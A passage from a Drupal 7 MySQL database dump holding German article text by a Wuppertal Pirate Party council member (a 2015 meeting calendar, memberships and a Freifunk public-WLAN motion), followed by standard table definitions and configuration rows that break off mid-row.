Elberfeld\r\n30.04.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nMai\r\n06.05.2015 Wuppertal 3.0\r\n11.05.2015 Ratssitzung\r\n13.05.2015 Beirat der Menschen mit Behinderung (Vetretung)\r\n19.05.2015 Auftaktveranstaltung Seilbahnprojekt\r\n20.05.2015 Diskussionsveranstaltung \"Das solidarische Bürgerticket\"\r\n21.05.2015 Wuppertal 3.0\r\n30.05.2015 Wuppertal 3.0\r\n\r\nJuni\r\n04.06.2015 Barmen Live\r\n06.06.2015 kommunales Mandatsträgertreffen\r\n09.06.2015 BV Barmen\r\n10.06.2015 BV Elberfeld\r\n11.06.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n11.06.2015 Ausstellung und Gespräch Seilbahnprojekt\r\n13.06.2015 Freiheit statt Angst Demo Düsseldorf\r\n16.06.2015 Infotermin mit Ausstellung Seilbahnprojekt\r\n16.06.2015 Podiumsdiskussion über ein bedingungsloses Grundeinkommen\r\n22.06.2015 Ratssitzung\r\n24.06.2015 Infoveranstaltung Ausbau L 419\r\n29.06.2015 Beginn der Sommerferien\r\n\r\nJuli\r\n23.07.20.15 Sondersitzung Stadtentwicklung, Wirtschaft und Bauen\r\n25.07.2015 Bundesparteitag 2015.1\r\n26.07.2015 Bundesparteitag 2015.1\r\n28.07.2015 Wahlausschuss für die Oberbürgermeisterwahl am 13. September 2015\r\n\r\nAugust\r\n17.08.2015 Ratssitzung\r\n20.08.2015 Betriebsauschuss Gebäudemanagement\r\n25.08.2015 BV Barmen\r\n27.08.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nSeptember\r\n01.09.2015 Ausschuss für Gleichstellung (Vertretung)\r\n05.09.2015 Heckinghausen ist bunt - für alle (Demo)\r\n07.09.2015 Ratssitzung\r\n13.09.2015 Oberbürgermeisterwahl\r\n15.09.2015 Wahlausschuss\r\n17.09.2015 Mit uns TTIP & CETA durchschauen!\r\n20.09.2015 kommunales Vernetzungstreffen\r\n\r\nOktober\r\n24./25.10.2015 Landesparteitag in Aachen\r\n27.10.2015 Ratssitzung\r\n28.10.2015 BV Elberfeld\r\n29.10.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n\r\nNovember\r\n09.11.2015 Ratssitzung\r\n10.11.2015 Letzte Ausfahrt Paris 2015 -Ende oder Wende\r\n23.11.2015 Eröffnung Lichtermarkt Elberfeld /Weihnachtsmarkt Barmen\r\n26.11.2015 Betriebsausschuss Gebäudemanagement\r\n\r\nDezember\r\n02.12.2015 BV Elberfeld\r\n03.12.2015 Ausschuss Stadtentwicklung, Wirtschaft und Bauen\r\n14.12.2015 Ratssitzung\r\n\r\n\r\nJeden 2. und 4. Donnerstag eines Monats Stammtisch im Abgeordnetenbüro Wichlinghauser Str. 61\r\n','','filtered_html'),('node','article',0,5,5,'und',0,'Ich bin Mitglied in folgenden Organisationen:\r\n\r\n
                                                  \r\n
                                                • ASV -Allgemeiner Sportverein Wuppertal e.V.
                                                • \r\n
                                                • ADAC - Allgemeiner Deutscher Automobilclub e.V.
                                                • \r\n
                                                • Musikpiraten e.V.
                                                • \r\n
                                                • NAG - Neue Assekuranz Gewerkschaft
                                                • \r\n
                                                • Piratenpartei NRW
                                                • \r\n
                                                • piKo NRW e.V.
                                                • \r\n
                                                ','','filtered_html'),('node','article',0,6,6,'und',0,'Diese Anträge habe ich (in Zusammenarbeit mit anderen Fraktionen) miteingereicht.\r\n\r\n30.09.2014 Ja zur kommunalen Selbstverwaltung und zur kommunalen Daseinsvorsorge\r\n10.02.2015 Aufhebung des Ratsbeschlusses zum Verkauf des Carnaper Platzes\r\n22.06.2015 Öffentliches WLAN in Wuppertal fördern - Freifunk-Standorte auf städtischen Gebäuden einrichten\r\n','','filtered_html'),('node','article',0,7,7,'und',0,'Ich bin schon seit Jahren ein Fan der Freifunk Idee.\r\nIch betreibe seit März 2015 den Freifunk Node im oberen Fischertal \"ff-ollital\".\r\nIn Zusammenarbeit mit Freifunk Wuppertal hat die Fraktion Bündnis 90 / Die Grünen\r\n einen Antrag in den Rat eingebracht, um das freie Internet in Wuppertal zu\r\nfördern.\r\nDas Gebäudemanagement hat dem Antrag vorbehaltlich der Kostenfrage am 16.04.2015\r\nzugestimmt.\r\nDer Stadtrat hat den Antrag am 11.02.2015 an den Stadtentwicklungsauschuss (Sitzung 11.06.) verwiesen, da die Verwaltung aber bis dahin das geforderte rechtliche Gutachten vorlegen konnte, haben wir den Antrag deshalb auf die Ausschusssitzung im August vertagt.\r\n\r\nDer Landtag NRW hat am 25.06.2015 beschlossen, die Dachflächen der landeseigenen Gebäuden dem Freifunk Rheinland e.V. zur Verfügung zu stellen.\r\n\r\nAm 19.08.2015 gab das GMW überraschend in einer Pressekonferenz bekannt, 850 Standorte für Router zur Verfügung zu stellen.\r\n\r\nIn der Ratssitzung vom 07.09.2015 wurde dies auch formell einstimmig beschlossen.\r\nHier sieht man die Auslastung der Router in Utopiastadt beim Trassenfest am 19.04.2015 sehr deutlich. 150 Clients waren zeitweise gleichzeitig verbunden.\r\n\r\nEs ist natürlich jedermensch freigestellt, einen eigenen Freifunk Node bei sich zu Hause zu betreiben.\r\nJe dichter die Vermaschung ist, desto wirksamer ist das ganze System.\r\n\r\nVielen Dank an Lukas Lamla, Babak Tubis und Ralf Glörfeld, die mit ihren Antworten und Erklärungen viel zu meinem Verständnis des Themas beigetragen haben.\r\n\r\nLinksammlung:\r\nBericht der Aktuellen Stunde zum Landtagsbeschluss\r\nFreifunk in Arnsberg realisiert (Arnsberg Info)\r\nStädte, die Freifunk aktiv unterstützen (Freifunk Forum)\r\nStromverbrauch (Freifunk Stuttgart)\r\nStromkosten (Freifunk Kiel)\r\nStrahlungsbelastung (Aktionsprogramm Umwelt und Gesundheit NRW)\r\nSprach- und Datenübertragung per Funk: Bluetooth und WLAN (Bundesamt für Strahlungsschutz)\r\nFreifunkantrag der Piratenfraktion im Landtag NRW\r\nFreifunk Rheinland e.V.\r\n350 neue WLAN-Standorte für Wien (ORF AT)\r\nSo bekommt Wuppertal WLAN (WZ-Newsline)','','filtered_html'); /*!40000 ALTER TABLE `field_revision_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_revision_comment_body` -- DROP TABLE IF EXISTS `field_revision_comment_body`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_revision_comment_body` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `comment_body_value` longtext, `comment_body_format` varchar(255) DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `comment_body_format` (`comment_body_format`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 1 (comment_body)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_revision_comment_body` -- LOCK TABLES `field_revision_comment_body` WRITE; /*!40000 ALTER TABLE `field_revision_comment_body` DISABLE KEYS */; /*!40000 ALTER TABLE `field_revision_comment_body` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_revision_field_image` -- DROP TABLE IF EXISTS `field_revision_field_image`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_revision_field_image` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_image_fid` int(10) unsigned DEFAULT NULL COMMENT 'The file_managed.fid being referenced in this field.', `field_image_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image’s ’alt’ attribute.', `field_image_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image’s ’title’ attribute.', `field_image_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.', `field_image_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.', PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_image_fid` (`field_image_fid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 4 (field_image)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_revision_field_image` -- LOCK TABLES `field_revision_field_image` WRITE; /*!40000 ALTER TABLE `field_revision_field_image` DISABLE KEYS */; /*!40000 ALTER TABLE `field_revision_field_image` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `field_revision_field_tags` -- DROP TABLE IF EXISTS `field_revision_field_tags`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `field_revision_field_tags` ( `entity_type` varchar(128) NOT NULL DEFAULT '' COMMENT 'The entity type this data is attached to', `bundle` varchar(128) NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance', `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted', `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to', `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to', `language` varchar(32) NOT NULL DEFAULT '' COMMENT 'The language for this data item.', `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields', `field_tags_tid` int(10) unsigned DEFAULT NULL, PRIMARY KEY (`entity_type`,`entity_id`,`revision_id`,`deleted`,`delta`,`language`), KEY `entity_type` (`entity_type`), KEY `bundle` (`bundle`), KEY `deleted` (`deleted`), KEY `entity_id` (`entity_id`), KEY `revision_id` (`revision_id`), KEY `language` (`language`), KEY `field_tags_tid` (`field_tags_tid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Revision archive storage for field 3 (field_tags)'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `field_revision_field_tags` -- LOCK TABLES `field_revision_field_tags` WRITE; /*!40000 ALTER TABLE `field_revision_field_tags` DISABLE KEYS */; INSERT INTO `field_revision_field_tags` VALUES ('node','article',0,4,4,'und',0,3),('node','article',0,6,6,'und',0,1),('node','article',0,6,6,'und',1,2); /*!40000 ALTER TABLE `field_revision_field_tags` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `file_managed` -- DROP TABLE IF EXISTS `file_managed`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `file_managed` ( `fid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'File ID.', `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The users.uid of the user who is associated with the file.', `filename` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the file with no path components. This may differ from the basename of the URI if the file is renamed to avoid overwriting an existing file.', `uri` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '' COMMENT 'The URI to access the file (either local or remote).', `filemime` varchar(255) NOT NULL DEFAULT '' COMMENT 'The file’s MIME type.', `filesize` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT 'The size of the file in bytes.', `status` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A field indicating the status of the file. Two status are defined in core: temporary (0) and permanent (1). Temporary files older than DRUPAL_MAXIMUM_TEMP_FILE_AGE will be removed during a cron run.', `timestamp` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'UNIX timestamp for when the file was added.', PRIMARY KEY (`fid`), UNIQUE KEY `uri` (`uri`), KEY `uid` (`uid`), KEY `status` (`status`), KEY `timestamp` (`timestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores information for uploaded files.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `file_managed` -- LOCK TABLES `file_managed` WRITE; /*!40000 ALTER TABLE `file_managed` DISABLE KEYS */; /*!40000 ALTER TABLE `file_managed` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `file_usage` -- DROP TABLE IF EXISTS `file_usage`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `file_usage` ( `fid` int(10) unsigned NOT NULL COMMENT 'File ID.', `module` varchar(255) NOT NULL DEFAULT '' COMMENT 'The name of the module that is using the file.', `type` varchar(64) NOT NULL DEFAULT '' COMMENT 'The name of the object type in which the file is used.', `id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The primary key of the object using the file.', `count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The number of times this file is used by this object.', PRIMARY KEY (`fid`,`type`,`id`,`module`), KEY `type_id` (`type`,`id`), KEY `fid_count` (`fid`,`count`), KEY `fid_module` (`fid`,`module`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Track where a file is used.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `file_usage` -- LOCK TABLES `file_usage` WRITE; /*!40000 ALTER TABLE `file_usage` DISABLE KEYS */; /*!40000 ALTER TABLE `file_usage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `filter` -- DROP TABLE IF EXISTS `filter`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `filter` ( `format` varchar(255) NOT NULL COMMENT 'Foreign key: The filter_format.format to which this filter is assigned.', `module` varchar(64) NOT NULL DEFAULT '' COMMENT 'The origin module of the filter.', `name` varchar(32) NOT NULL DEFAULT '' COMMENT 'Name of the filter being referenced.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Weight of filter within format.', `status` int(11) NOT NULL DEFAULT '0' COMMENT 'Filter enabled status. (1 = enabled, 0 = disabled)', `settings` longblob COMMENT 'A serialized array of name value pairs that store the filter settings for the specific format.', PRIMARY KEY (`format`,`name`), KEY `list` (`weight`,`module`,`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Table that maps filters (HTML corrector) to text formats ...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `filter` -- LOCK TABLES `filter` WRITE; /*!40000 ALTER TABLE `filter` DISABLE KEYS */; INSERT INTO `filter` VALUES ('filtered_html','filter','filter_autop',2,1,'a:0:{}'),('filtered_html','filter','filter_html',1,1,'a:3:{s:12:\"allowed_html\";s:74:\"
                                                  1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}'),('filtered_html','filter','filter_htmlcorrector',10,1,'a:0:{}'),('filtered_html','filter','filter_html_escape',-10,0,'a:0:{}'),('filtered_html','filter','filter_url',0,1,'a:1:{s:17:\"filter_url_length\";i:72;}'),('full_html','filter','filter_autop',1,1,'a:0:{}'),('full_html','filter','filter_html',-10,0,'a:3:{s:12:\"allowed_html\";s:74:\"
                                                      1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}'),('full_html','filter','filter_htmlcorrector',10,1,'a:0:{}'),('full_html','filter','filter_html_escape',-10,0,'a:0:{}'),('full_html','filter','filter_url',0,1,'a:1:{s:17:\"filter_url_length\";i:72;}'),('php_code','filter','filter_autop',0,0,'a:0:{}'),('php_code','filter','filter_html',-10,0,'a:3:{s:12:\"allowed_html\";s:74:\"
                                                          1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}'),('php_code','filter','filter_htmlcorrector',10,0,'a:0:{}'),('php_code','filter','filter_html_escape',-10,0,'a:0:{}'),('php_code','filter','filter_url',0,0,'a:1:{s:17:\"filter_url_length\";s:2:\"72\";}'),('php_code','php','php_code',0,1,'a:0:{}'),('plain_text','filter','filter_autop',2,1,'a:0:{}'),('plain_text','filter','filter_html',-10,0,'a:3:{s:12:\"allowed_html\";s:74:\"
                                                              1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}'),('plain_text','filter','filter_htmlcorrector',10,0,'a:0:{}'),('plain_text','filter','filter_html_escape',0,1,'a:0:{}'),('plain_text','filter','filter_url',1,1,'a:1:{s:17:\"filter_url_length\";i:72;}'); /*!40000 ALTER TABLE `filter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `filter_format` -- DROP TABLE IF EXISTS `filter_format`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `filter_format` ( `format` varchar(255) NOT NULL COMMENT 'Primary Key: Unique machine name of the format.', `name` varchar(255) NOT NULL DEFAULT '' COMMENT 'Name of the text format (Filtered HTML).', `cache` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'Flag to indicate whether format is cacheable. (1 = cacheable, 0 = not cacheable)', `status` tinyint(3) unsigned NOT NULL DEFAULT '1' COMMENT 'The status of the text format. (1 = enabled, 0 = disabled)', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Weight of text format to use when listing.', PRIMARY KEY (`format`), UNIQUE KEY `name` (`name`), KEY `status_weight` (`status`,`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores text formats: custom groupings of filters, such as...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `filter_format` -- LOCK TABLES `filter_format` WRITE; /*!40000 ALTER TABLE `filter_format` DISABLE KEYS */; INSERT INTO `filter_format` VALUES ('filtered_html','Filtered HTML',1,1,0),('full_html','Full HTML',1,1,1),('php_code','PHP code',0,1,11),('plain_text','Plain text',1,1,10); /*!40000 ALTER TABLE `filter_format` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `flood` -- DROP TABLE IF EXISTS `flood`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `flood` ( `fid` int(11) NOT NULL AUTO_INCREMENT COMMENT 'Unique flood event ID.', `event` varchar(64) NOT NULL DEFAULT '' COMMENT 'Name of event (e.g. contact).', `identifier` varchar(128) NOT NULL DEFAULT '' COMMENT 'Identifier of the visitor, such as an IP address or hostname.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'Timestamp of the event.', `expiration` int(11) NOT NULL DEFAULT '0' COMMENT 'Expiration timestamp. Expired events are purged on cron run.', PRIMARY KEY (`fid`), KEY `allow` (`event`,`identifier`,`timestamp`), KEY `purge` (`expiration`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Flood controls the threshold of events, such as the...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `flood` -- LOCK TABLES `flood` WRITE; /*!40000 ALTER TABLE `flood` DISABLE KEYS */; /*!40000 ALTER TABLE `flood` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `history` -- DROP TABLE IF EXISTS `history`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `history` ( `uid` int(11) NOT NULL DEFAULT '0' COMMENT 'The users.uid that read the node nid.', `nid` int(11) NOT NULL DEFAULT '0' COMMENT 'The node.nid that was read.', `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp at which the read occurred.', PRIMARY KEY (`uid`,`nid`), KEY `nid` (`nid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='A record of which users have read which nodes.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `history` -- LOCK TABLES `history` WRITE; /*!40000 ALTER TABLE `history` DISABLE KEYS */; /*!40000 ALTER TABLE `history` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `image_effects` -- DROP TABLE IF EXISTS `image_effects`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `image_effects` ( `ieid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for an image effect.', `isid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The image_styles.isid for an image style.', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'The weight of the effect in the style.', `name` varchar(255) NOT NULL COMMENT 'The unique name of the effect to be executed.', `data` longblob NOT NULL COMMENT 'The configuration data for the effect.', PRIMARY KEY (`ieid`), KEY `isid` (`isid`), KEY `weight` (`weight`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configuration options for image effects.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `image_effects` -- LOCK TABLES `image_effects` WRITE; /*!40000 ALTER TABLE `image_effects` DISABLE KEYS */; /*!40000 ALTER TABLE `image_effects` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `image_styles` -- DROP TABLE IF EXISTS `image_styles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `image_styles` ( `isid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The primary identifier for an image style.', `name` varchar(255) NOT NULL COMMENT 'The style machine name.', `label` varchar(255) NOT NULL DEFAULT '' COMMENT 'The style administrative name.', PRIMARY KEY (`isid`), UNIQUE KEY `name` (`name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Stores configuration options for image styles.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `image_styles` -- LOCK TABLES `image_styles` WRITE; /*!40000 ALTER TABLE `image_styles` DISABLE KEYS */; /*!40000 ALTER TABLE `image_styles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `menu_custom` -- DROP TABLE IF EXISTS `menu_custom`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `menu_custom` ( `menu_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique key for menu. This is used as a block delta so length is 32.', `title` varchar(255) NOT NULL DEFAULT '' COMMENT 'Menu title; displayed at top of block.', `description` text COMMENT 'Menu description.', PRIMARY KEY (`menu_name`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Holds definitions for top-level custom menus (for example...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `menu_custom` -- LOCK TABLES `menu_custom` WRITE; /*!40000 ALTER TABLE `menu_custom` DISABLE KEYS */; INSERT INTO `menu_custom` VALUES ('main-menu','Main menu','The Main menu is used on many sites to show the major sections of the site, often in a top navigation bar.'),('management','Management','The Management menu contains links for administrative tasks.'),('navigation','Navigation','The Navigation menu contains links intended for site visitors. Links are added to the Navigation menu automatically by some modules.'),('user-menu','User menu','The User menu contains links related to the user\'s account, as well as the \'Log out\' link.'); /*!40000 ALTER TABLE `menu_custom` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `menu_links` -- DROP TABLE IF EXISTS `menu_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `menu_links` ( `menu_name` varchar(32) NOT NULL DEFAULT '' COMMENT 'The menu name. All links with the same menu name (such as ’navigation’) are part of the same menu.', `mlid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The menu link ID (mlid) is the integer primary key.', `plid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The parent link ID (plid) is the mlid of the link above in the hierarchy, or zero if the link is at the top level in its menu.', `link_path` varchar(255) NOT NULL DEFAULT '' COMMENT 'The Drupal path or external path this link points to.', `router_path` varchar(255) NOT NULL DEFAULT '' COMMENT 'For links corresponding to a Drupal path (external = 0), this connects the link to a menu_router.path for joins.', `link_title` varchar(255) NOT NULL DEFAULT '' COMMENT 'The text displayed for the link, which may be modified by a title callback stored in menu_router.', `options` blob COMMENT 'A serialized array of options to be passed to the url() or l() function, such as a query string or HTML attributes.', `module` varchar(255) NOT NULL DEFAULT 'system' COMMENT 'The name of the module that generated this link.', `hidden` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag for whether the link should be rendered in menus. (1 = a disabled menu item that may be shown on admin screens, -1 = a menu callback, 0 = a normal, visible link)', `external` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate if the link points to a full URL starting with a protocol, like http:// (1 = external, 0 = internal).', `has_children` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Flag indicating whether any links have this link as a parent (1 = children exist, 0 = no children).', `expanded` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Flag for whether this link should be rendered as expanded in menus - expanded links always have their child links displayed, instead of only when the link is in the active trail (1 = expanded, 0 = not expanded)', `weight` int(11) NOT NULL DEFAULT '0' COMMENT 'Link weight among links in the same menu at the same depth.', `depth` smallint(6) NOT NULL DEFAULT '0' COMMENT 'The depth relative to the top level. A link with plid == 0 will have depth == 1.', `customized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate that the user has manually created or edited the link (1 = customized, 0 = not customized).', `p1` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The first mlid in the materialized path. If N = depth, then pN must equal the mlid. If depth > 1 then p(N-1) must equal the plid. All pX where X > depth must equal zero. The columns p1 .. p9 are also called the parents.', `p2` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The second mlid in the materialized path. See p1.', `p3` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The third mlid in the materialized path. See p1.', `p4` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The fourth mlid in the materialized path. See p1.', `p5` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The fifth mlid in the materialized path. See p1.', `p6` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The sixth mlid in the materialized path. See p1.', `p7` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The seventh mlid in the materialized path. See p1.', `p8` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The eighth mlid in the materialized path. See p1.', `p9` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The ninth mlid in the materialized path. See p1.', `updated` smallint(6) NOT NULL DEFAULT '0' COMMENT 'Flag that indicates that this link was generated during the update from Drupal 5.', PRIMARY KEY (`mlid`), KEY `path_menu` (`link_path`(128),`menu_name`), KEY `menu_plid_expand_child` (`menu_name`,`plid`,`expanded`,`has_children`), KEY `menu_parents` (`menu_name`,`p1`,`p2`,`p3`,`p4`,`p5`,`p6`,`p7`,`p8`,`p9`), KEY `router_path` (`router_path`(128)) ) ENGINE=InnoDB AUTO_INCREMENT=547 DEFAULT CHARSET=utf8 COMMENT='Contains the individual links within a menu.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `menu_links` -- LOCK TABLES `menu_links` WRITE; /*!40000 ALTER TABLE `menu_links` DISABLE KEYS */; INSERT INTO `menu_links` VALUES ('management',1,0,'admin','admin','Administration','a:0:{}','system',0,0,1,0,9,1,0,1,0,0,0,0,0,0,0,0,0),('user-menu',2,0,'user','user','User account','a:1:{s:5:\"alter\";b:1;}','system',0,0,0,0,-10,1,0,2,0,0,0,0,0,0,0,0,0),('navigation',3,0,'comment/%','comment/%','Comment permalink','a:0:{}','system',0,0,1,0,0,1,0,3,0,0,0,0,0,0,0,0,0),('navigation',4,0,'filter/tips','filter/tips','Compose tips','a:0:{}','system',1,0,1,0,0,1,0,4,0,0,0,0,0,0,0,0,0),('navigation',5,0,'node/%','node/%','','a:0:{}','system',0,0,0,0,0,1,0,5,0,0,0,0,0,0,0,0,0),('navigation',6,0,'node/add','node/add','Add content','a:0:{}','system',0,0,1,0,0,1,0,6,0,0,0,0,0,0,0,0,0),('management',7,1,'admin/appearance','admin/appearance','Appearance','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}','system',0,0,0,0,-6,2,0,1,7,0,0,0,0,0,0,0,0),('management',8,1,'admin/config','admin/config','Configuration','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}','system',0,0,1,0,0,2,0,1,8,0,0,0,0,0,0,0,0),('management',9,1,'admin/content','admin/content','Content','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}','system',0,0,1,0,-10,2,0,1,9,0,0,0,0,0,0,0,0),('user-menu',10,2,'user/register','user/register','Create new 